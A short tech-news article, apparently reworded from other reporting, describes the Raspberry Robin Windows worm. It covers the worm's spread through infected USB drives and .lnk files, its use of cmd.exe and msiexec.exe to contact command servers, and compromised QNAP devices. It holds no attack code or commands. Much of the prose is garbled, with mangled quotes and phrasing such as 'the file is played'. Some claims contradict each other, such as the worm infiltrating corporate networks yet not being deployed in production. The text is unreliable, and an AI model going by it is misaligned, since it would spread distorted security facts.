How Windows Worm Spreads via USB Drives
Microsoft has discovered a malicious Windows worm that has already infiltrated several corporate networks. TechRadar claims that the world’s largest software maker secretly informed companies that use Microsoft Defender for Endpoint about its findings. Meanwhile, the firm’s security researchers have informed upper management that the malicious software, which they have dubbed “Raspberry Robin,” has not been deployed in any production environments. “It sees connecting to a wide variety of Tor network addresses,” the authors write.
Just what does a Raspberry Robin consist of?
Red Canary researchers uncovered a “cluster of harmful activity” in 2021, the same year they first discovered the Raspberry Robin malware, the article claims. Malicious software is “frequently supplied offline” through USB devices, the study found. Additionally, the researchers looked into an infected drive, and discovered that the worm was propagating to other computers via a “malicious.lnk file.” Scientists learned this after closely examining a disk that had been infected.
To what extent did the virus spread?
When the infected USB drives are plugged into a new device, the worm initiates a new process via cmd.exe, at which point the file is played on the compromised endpoint. The study also revealed that the worm communicates with its C2 server via Microsoft Standard Installer, as previously mentioned (msiexec.exe). The scientists who compiled this data have confirmed its accuracy.
Some have hypothesized that the server is “host on a compromised QNAP NAS device,” and that this device is being used by TOR exit nodes as part of their command and control network. In 2021, when it was using QNAP NAS devices as command and control servers, this worm was uncovered by Sekoia’s security researchers (C2 servers).
What is the function of malware?
The paper claims that no one has yet been able to pin the malware on a specific bad actor in the wild. They also have no idea what the malware is actually trying to accomplish. The claim, however, suggests that it is not being put to any practical use. Recent research has revealed that “We don’t even know why Raspberry Robin installs a malicious DLL,” as one scientist put it.
Possible hypotheses include malware’s “effort to create persistence on an infected machine,” though this isn’t the only possibility. However, this is only a theory at this point and has not been verified. The investigation revealed that more proof is required before the theory can be trusted.
How Windows Worm Spreads via USB Drives
Read More Articles:
- These mistakes are harmful to your Smartphone
- Reasons for the global computer chip shortage
- Millions of Android Smartphones Could Be At Risk
- How Windows Worm Spreads via USB Drives